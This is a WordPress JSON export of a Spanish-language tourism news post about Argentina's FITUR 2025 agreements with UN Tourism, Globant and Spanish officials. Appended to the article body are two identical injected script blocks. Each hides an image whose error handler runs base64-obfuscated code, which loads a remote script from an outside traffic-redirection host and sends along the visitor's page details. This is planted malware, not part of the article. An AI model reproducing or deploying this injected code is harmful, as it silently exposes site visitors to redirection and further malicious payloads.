{"id":4757,"date":"2025-01-22T11:22:02","date_gmt":"2025-01-22T14:22:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4757"},"modified":"2025-08-13T23:42:13","modified_gmt":"2025-08-14T02:42:13","slug":"exitosa-jornada-previa-al-inicio-de-fitur","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4757","title":{"rendered":"Exitosa jornada previa al inicio de FITUR"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-0849f80bb7acf82aac069a93892bb8d5\" style=\"background-color:#1a4157\"><em>Se firm\u00f3 un acuerdo con ONU Turismo para impulsar inversiones en la Argentina. Reuni\u00f3n con empresarios del \u00e1rea de Innovaci\u00f3n Tecnol\u00f3gica, y con autoridades de Turismo de Espa\u00f1a, para promover el intercambio tur\u00edstico entre ambos pa\u00edses.<\/em><\/h4>\n\n\n\n<p>La Rep\u00fablica Argentina firm\u00f3 ayer, en Espa\u00f1a, un acuerdo con\u00a0<strong>ONU Turismo<\/strong>\u00a0para difundir oportunidades de inversi\u00f3n en el territorio nacional mediante la organizaci\u00f3n de un foro convocado con esa finalidad y el lanzamiento de una gu\u00eda de inversi\u00f3n previsto para abril pr\u00f3ximo.<\/p>\n\n\n\n<p>\u201c<em>Los objetivos del acuerdo cuentan con la adhesi\u00f3n del sector privado, que apoya no solo la actual pol\u00edtica macroecon\u00f3mica argentina en cuanto a estabilidad, proyecci\u00f3n de crecimiento, cr\u00e9dito y salida del cepo cambiario, sino tambi\u00e9n en la pol\u00edtica tur\u00edstica implementada, que abarca puntos clave como cielos abiertos, desregulaci\u00f3n de agencias y beneficios para el sector hotelero<\/em>\u201d,&nbsp;<strong>Scioli<\/strong>&nbsp;se\u00f1al\u00f3.<\/p>\n\n\n\n<p>\u201c<em>La colaboraci\u00f3n p\u00fablico-privada es esencial para llevar adelante estos objetivos concretos, que vienen a traer beneficios para el sector, siempre en l\u00ednea con la agenda del&nbsp;<strong>presidente Milei<\/strong>&nbsp;de poner a la Argentina a la vanguardia de la innovaci\u00f3n en el escenario mundial<\/em>\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>El acuerdo, suscripto en el marco de las actividades de la participaci\u00f3n argentina en la FITUR que se realiza en Madrid, tambi\u00e9n contempla el acompa\u00f1amiento de acciones de gobernanza tur\u00edstica centradas en la formaci\u00f3n de toda la cadena tur\u00edstica y avanzar en el establecimiento en el pa\u00eds de una&nbsp;<strong>Oficina Regional Especializada en Innovaci\u00f3n Tur\u00edstica<\/strong>.<\/p>\n\n\n\n<p>De la firma del acuerdo participaron el secretario general del organismo,&nbsp;<strong>Zurab Pololikashvili<\/strong>; el secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>; el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>, y el director regional para las Am\u00e9ricas de ONU Turismo,&nbsp;<strong>Gustavo Santos<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/jornada_previa_fitur_2025_1.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Asimismo, el Secretario tuvo una audiencia con Martin Umaran, el cofundador y presidente para Europa, Oriente Medio y \u00c1frica de&nbsp;<strong>Globant<\/strong>, empresa digital de ingenier\u00eda de software y tecnolog\u00eda de la informaci\u00f3n.<\/p>\n\n\n\n<p>El encuentro busc\u00f3 impulsar una alianza estrat\u00e9gica para potenciar el \u00e1rea de Innovaci\u00f3n Tecnol\u00f3gica en Argentina. La intenci\u00f3n es aplicar la tecnolog\u00eda con foco en la&nbsp;<strong>inteligencia artificial en el marketing digital<\/strong>&nbsp;para aumentar las ventas del rubro tur\u00edstico a trav\u00e9s de redes sociales y brindar as\u00ed servicios m\u00e1s competitivos.<\/p>\n\n\n\n<p>Por \u00faltimo, se reuni\u00f3 con la secretaria de Estado de Turismo de Espa\u00f1a,&nbsp;<strong>Rosario S\u00e1nchez Grau<\/strong>, y el director de la divisi\u00f3n de cooperaci\u00f3n y competitividad tur\u00edstica,&nbsp;<strong>Rub\u00e9n L\u00f3pez Pulido<\/strong>, con quienes avanzaron en cooperar en materia de turismo entre naciones, para intercambiar experiencias con Espa\u00f1a en destinos tur\u00edsticos inteligentes, y para la vinculaci\u00f3n entre los eventos deportivos&nbsp;y&nbsp;el&nbsp;turismo.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/jornada_previa_fitur_2025_2.jpg\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se firm\u00f3 un acuerdo con ONU Turismo para impulsar inversiones en la Argentina. Reuni\u00f3n con empresarios del \u00e1rea de Innovaci\u00f3n Tecnol\u00f3gica, y con autoridades de Turismo de Espa\u00f1a, para promover el intercambio tur\u00edstico entre ambos pa\u00edses. La Rep\u00fablica Argentina firm\u00f3 ayer, en Espa\u00f1a, un acuerdo con\u00a0ONU Turismo\u00a0para difundir oportunidades de inversi\u00f3n en el territorio nacional [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4758,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,22],"tags":[],"class_list":{"0":"post-4757","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4757"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4757"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4757\/revisions"}],"predecessor-version":[{"id":6592,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4757\/revisions\/6592"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4758"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4757"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4757"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4757"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}